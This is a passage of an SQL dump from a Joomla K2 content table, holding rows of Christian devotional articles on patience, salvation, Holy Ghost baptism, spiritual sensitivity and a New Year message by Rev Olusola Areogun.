[/blockquote]</p>\r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', NULL, NULL, '[]', '', '2014-07-26 00:00:00', 199, '', 0, '0000-00-00 00:00:00', '2016-12-31 18:54:20', 196, '2014-07-26 00:00:00', '0000-00-00 00:00:00', 1, 1, 2, 0, 0, '', '', '', '', 6, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(7, 'Patience with Divine Working', 'patience', 5, 1, '<p> </p>\r\n<p>There is a patience that we need with God. God requires constancy in what you are doing for Him. Impatience disrupts the work of God in the lives of his people.Impatience can cause a person to make avoidable mistakes. There is a patience that we must allow for God to do all that He intends to do in us, with us and through us. You can’t write all the books that God has placed in your spirit in one year; that is not possible so you need to exercise patience.</p>\r\n', '\r\n<p> There are some things that I believe you did five years ago, that if you will do them now, most likely you will do them better. There are some of the books that I have written that now when I read them, I want to re-write them. Just as people must be patient with us we must be patient with God also.</p>\r\n<p>The words patience, longsuffering and endurance are triplets of the same father. You need longsuffering with people; you need endurance when you are dealing with the devil while patience is what you need when you are dealing with God. The Bible says you have need of patience after you have done the will of God. Not before but after, so that you can obtain what He promised. Have you done the will of God? Stand and stand therefore! Having done all, the Bible says stand now and that “stand” may take you ten years. What is the all that God is asking you to do? What is the all that you know, that is right and that is required of you to do? Having done all is about doing what is legitimately possible for you to do. God is never asking you to do what is impossible for you to do! Patience is waiting for the salvation of the Lord.</p>\r\n<p>As a child of God, keep using your small days to develop stamina for the long distance. Whatever God allows you to do is a long distance race. After you receive the calling and start, you must settle down to a long distance trip. Immature people always want to arrive too soon because to them success is a destination. To the mature, success is not a destination but an unfolding journey and even when you think you have gotten to the place of arrival, God many times says you are just starting. So be patient and keep giving your all, keep sowing seed and keep putting out your best. May you have sufficient patience in this New Year to step into all that the father has prepared for you in Jesus’ name.</p>', NULL, NULL, '[]', '', '2016-12-30 00:00:00', 199, '', 0, '0000-00-00 00:00:00', '2016-12-31 21:38:50', 196, '2016-12-30 00:00:00', '0000-00-00 00:00:00', 0, 1, 2, 0, 0, '', '', '', '', 2710, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(8, 'Who is Genuinely Saved', 'who-is-genuinely-saved', 2, 1, '<p>Introduction: Knowing whether one is saved is a major question everyone needs to answer on this earth and on time. This is one of the questions that no other man can answer as much as the person involved. The young and the aged, male and female, white and black, learned and illiterate etc all need to answer this singular question of life – Am I genuinely saved?</p>\r\n', '\r\n<p>…. Let’s make sure.</p>\r\n<p>My friend, assumption is the lowest form of knowledge and when it comes to critical things of life, you don’t work on assumption but reality.</p>\r\n<p>No woman assumes she’s pregnant. She goes for tests and proves it! No student assumes he’s being admitted into higher institution, he goes to confirm and check it out on their list.</p>\r\n<p>You cannot assume you’re saved because of one or two religious practices you do, you need to make sure.</p>\r\n<p>Let me take you through some test questions that shows what does not confer salvation on anyone:</p>\r\n<ul>\r\n<li>Have you just joined a born again church?</li>\r\n<li>Do you have a lot of born again friends?</li>\r\n<li>Are you doing your best not to harm another human being?</li>\r\n<li>Are you full of many good works?</li>\r\n<li>Have you just made several good resolutions to turn a new leaf?</li>\r\n<li>Do you believe you are good enough as you were born and bred?</li>\r\n<li>Do you even believe what the Bible said about Jesus being the saviour of the whole world (but with no personal relationship with Him)?</li>\r\n<li>Do you give money to churches, men of God and projects?</li>\r\n<li>Are you holding spiritual titles presently and many in your past?</li>\r\n</ul>\r\n<p>Beloved, answering \'Yes\' to all these CANNOT SAVE YOU.</p>\r\n<p>Isaiah 64:6a says, “But we are all as an unclean thing, and all our righteousness are as filthy rags;”</p>\r\n<p>The Bible says all have sinned and have come short of God’s glory – Rom. 3:23 Who then is saved? How can you be saved?</p>\r\n<ol>\r\n<li>Realize that you are a sinner -  “For all have sinned, and come “short of the glory of God” Rom 3:23</li>\r\n<li>Receive the gospel (good news of what Jesus did on the cross – died for your sins). - For there is one God, and one mediator between God and men, the man Christ Jesus; who gave himself a ransom for all, to be testified in due time. 1 Tim. 2:5-6. “This is a faithful saying, and worthy of all acceptation, that Christ Jesus came into the world to save sinners; of whom I am chief. 1 Tim. 1:15</li>\r\n<li>Realize through the preaching of the gospel the sinfulness of your personal sin.</li>\r\n<li>Realize your need of a personal saviour from sin. “Jesus said to him. Do you believe in the son of God? John 9:35-38.</li>\r\n<li>Make a spiritual willful decision to turn away from sin and the sinful state and turn to Jesus to be your personal Lord and Saviour. “Repent ye therefore, and be converted, that your sins may be blotted out, when the times of refreshing shall come from the presence of the Lord. Act 3:19. Some people turn to good deed and doing penance or self torture for a personal Saviour; No, only Jesus can be your personal saviour.</li>\r\n<li>Believe the report of God about Jesus. Rom. 10:9-10.   “That if thou shalt confess with thy mouth the Lord Jesus, and shalt believe in thine heart that God hath raised him from the dead, thou shalt be saved. For with the heart man believeth unto righteousness; and with the mouth confession is made unto salvation.”</li>\r\n<li>Have a credible evidence of a changed life and attitude to sin, God, people of God and the world based on your repentance and acceptance of Jesus. “Therefore if any man be in Christ, he is a new creature: old things are passed away; behold, all things are become new.” II Cor. 5:17</li>\r\n<li>Be irrevocably committed to following Jesus and His will and word in all issues of life. “What will you have me to do Lord?” Acts. 9:6 If you do these things you’ll be saved.</li>\r\n</ol>\r\n<p>Do you want to accept Christ into your heart now? Pray this prayer.</p>\r\n<p> </p>\r\n<p>Father I come to you in the name of Jesus.  I know that I’m a sinner and cannot save myself. But Jesus died for me, He shed His blood that I might be saved, today I accept Jesus  as my personal Lord and saviour, forgive me all my sins, wash me with your blood and make me whole. I forsake the devil, the world and all sinful habits, I believe with my heart and confess with my mouth that Jesus is my Lord. Father I thank you because you have saved me in Jesus name. Amen.</p>', NULL, NULL, '[]', '', '2016-12-31 21:38:55', 199, '', 0, '0000-00-00 00:00:00', '2018-04-08 11:52:18', 196, '2016-12-31 21:38:55', '0000-00-00 00:00:00', 0, 1, 3, 0, 1, '', '', '', '', 6503, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(9, 'How to Receive Holy Ghost Baptism', 'how-to-receive-holy-ghost-baptism', 2, 1, '<p>By asking for Him in the place of prayer i.e. you personally desire Him, you have to understand that the promise of the Holy Ghost is meant for you and your children (Acts 2:39). Yielding yourself to the Holy Ghost, the power of God is going to come upon you and you will begin to speak in tongues, which is the evidence of the Holy Ghost baptism. Acts 2:1-4, 10:44-46.</p>\r\n', '\r\n<p>By laying on of hands of a servant of God: A genuine called minister of God minister Holy Ghost baptism to you by laying his hands on you and praying for you. Acts 19:2-6, Acts 6:6.</p>\r\n<p>It should be noted that the same storms of life came against the believer and the unbeliever, but the believer has an advantage which is the Holy Ghost. Receive the Holy Ghost baptism because the promise is for you now and for generations that are coming after you if the Lord tarries. Read Acts 19:1-6, Acts 2:4 to him and then pray for him. Encourage him to start speaking the words as they come.</p>\r\n<ol>\r\n<li>Don’ts of The Holy Ghost Baptism</li>\r\n<li>Don’t teach him your own tongues.</li>\r\n<li>Don’t equal Hallelujah in a fast way to speaking in tongues.</li>\r\n<li>Don’t mistake a demonic manifestation for Holy Ghost move.</li>\r\n<li>Don’t get discouraged if he doesn’t speak immediately, encourage him to keep applying faith and get him a copy of “What meaneth this?”</li>\r\n<li>Don’t minister Holy Ghost baptism to a sinner, one that is not yet born again (1 Cor. 2:14, ascertain his conversion first).</li>\r\n<li>Lastly, encourage him beyond speaking in tongues. Let him study. 1 Cor. 12, 14; John 14, 16, Romans 8.</li>\r\n</ol>', NULL, NULL, '[]', '', '2016-12-31 21:47:43', 196, '', 0, '0000-00-00 00:00:00', '2017-01-01 07:06:19', 196, '2016-12-31 21:47:43', '0000-00-00 00:00:00', 0, 1, 2, 0, 2, '', '', '', '', 7109, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(11, 'You made it CONGRATULATIONS!', 'you-made-it-congratulations', 5, 1, '<p>However as we move into the new year, I want to encourage you STAY IN YOUR PLACE!. DETERMINE to stay in your place. There    will    be   battles   of   replacement     and displacement  but you must stay in your place.   Hold your ground don\'t give up or give in to the enemy. The bible says in the book of proverbs 27:8, \"like a bird that wanders out of it\'s nest so is a man who wanders out of his place\" there  is  a place  called \'your  place\',</p>\r\n', '\r\n<p> don\'t allow  yourself to be kicked out of your place.  God has ordained  you to prosper  and flourish  in your place, don\'t get carried  away with the trend. Seek out your own place and stay there. No matter the hardship  or challenges, your own place is the best place  for you to grow  strong  and prosper.   Hold your  ground,  labor, invest,  work,  sow  in  your  place   and  see  glorious things happen  for you and to you.  Isaac  sowed in the land where famine struck and he yielded   harvest in a hundred folds,  be instructed   beloved.  The beginning of vagabondary  is leaving your place.</p>\r\n<p>Your place could mean a location, it could be a state of heart,  a condition  of mind, a position,  your  role  in ministry, your assignments  or even your posturing, whatever  it  means   to  you,  DON\'T LEAVE YOUR PLACE. Lucifer left his  place, King Saul left his  place, Vashti  left  her  place,  Demas,  John   Mark,  Judas,  the prodigal  son,  Adonija,  Absalom,  Jonathan,   Adam and  Eve all left their places in God. 2017 is a year for men and women who will take their   places  and   remain   there   strongly,  forcefully  powerfully without compromising.  The scripture  talks of one of David\'s mighty men called Shammar,  the son of Agee in the book of 2 Samuel 23:9 who held  his ground on a field of lentils when the philistines   came against  Israel,  others  fled, but he stood his ground the bible said in verse 12 \"but he stood in the midst of the ground and defendedit and slew the philistines and the LORDwrought a great victory\"</p>\r\n<p>Heaven is ready to back up men and women who stay in their place and stand their ground even if the popular trend is contrary. Pastor, stand  your  ground, don\'t  compromise;  Son, keep being a faithful son, don\'t try to usurp your fathers place;  Wife, keep being faithful, young man,  young lady stand your  ground  for the Lord  and keep loving  Him,  STAY in your place. The Lord Jesus  Christ stayed in His place and today He has a name above all names. Lucifer is forever condemned  to eternal  punishment  with his angels  because they left his place. Don\'t let him lure you out ofyour place.  Stay in your place.</p>\r\n<p>Till next year go and win with Jesus</p>\r\n<p>God\'s Servant</p>\r\n<p>Rev Olusola Areogun</p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-01-01 10:58:58', 199, '', 0, '0000-00-00 00:00:00', '2017-01-07 21:48:26', 196, '2017-01-01 10:58:58', '0000-00-00 00:00:00', 0, 1, 3, 0, 0, '', '', '', '', 2470, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*');
INSERT INTO `y57u5_k2_items` (`id`, `title`, `alias`, `catid`, `published`, `introtext`, `fulltext`, `video`, `gallery`, `extra_fields`, `extra_fields_search`, `created`, `created_by`, `created_by_alias`, `checked_out`, `checked_out_time`, `modified`, `modified_by`, `publish_up`, `publish_down`, `trash`, `access`, `ordering`, `featured`, `featured_ordering`, `image_caption`, `image_credits`, `video_caption`, `video_credits`, `hits`, `params`, `metadesc`, `metadata`, `metakey`, `plugins`, `language`) VALUES
(10, 'Ways to Increase your Sensitivity', 'sensitivity', 2, 1, '<p>Today, I want to share with you ways that you can increase your spiritual sensitivity.</p>\r\n<ul>\r\n<li>Stay away from un-anointed atmospheres. Create an atmosphere of the anointing by constant worship, praise, and regularly listening to messages.', '</li>\r\n<li>Maintain close contact with authentic gifts and callings of the Holy Spirit. Stop staying around strange spiritual influences, false prophets, and people that operate in falsehood. Find genuine ministers around you, listen to them and attend their ministry. </li>\r\n<li>Increase your intake of the word of God. One of the signs of spiritual sickness is losing appetite for the word of God. Study the Bible regularly. Read the bible through in a year.</li>\r\n<li>Increase your confession of the word of God. Your words affect your spirit.</li>\r\n<li>Regular fasting. Fasting is a booster to spiritual activities. Majority of Christians are struggling because they can\'t get to the frequency that God is communicating with them. You should note that fasting does not change God, fasting changes you. Fasting fine-tunes your frequency to the frequency of the Holy Spirit. If you’re not concentrating on something spiritual, you are not fasting but just doing hunger strike. Don’t use fasting to bribe God to change His mind concerning a matter.</li>\r\n<li>Allow the fruit of the Spirit to grow in you. </li>\r\n<li>Reduce emotionalism. Don\'t let your emotions or another person\'s emotions rule you. Negative passions reduce spiritual sensitivity. Anger, wrath, malice and offenses are all enemies of spiritual sensitivity.</li>\r\n<li>Spend more time speaking in tongue.</li>\r\n<li>Instant obedience to divine signal. Divine signals come through your conscience.</li>\r\n<li>Learn to rebuke wrong spirits. Cast down every evil imagination, any anything that is against the knowledge of God. Learn to walk with the Lord until your heart is stronger than your brain, body, and men\'s opinion. Your body language in the presence of God will signal the attitude of God towards you.</li>\r\n</ul>', NULL, NULL, '[]', '', '2017-01-01 07:06:51', 196, '', 0, '0000-00-00 00:00:00', '2018-04-08 10:51:43', 196, '2017-01-01 07:06:51', '0000-00-00 00:00:00', 0, 1, 4, 0, 0, '', '', '', '', 18903, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
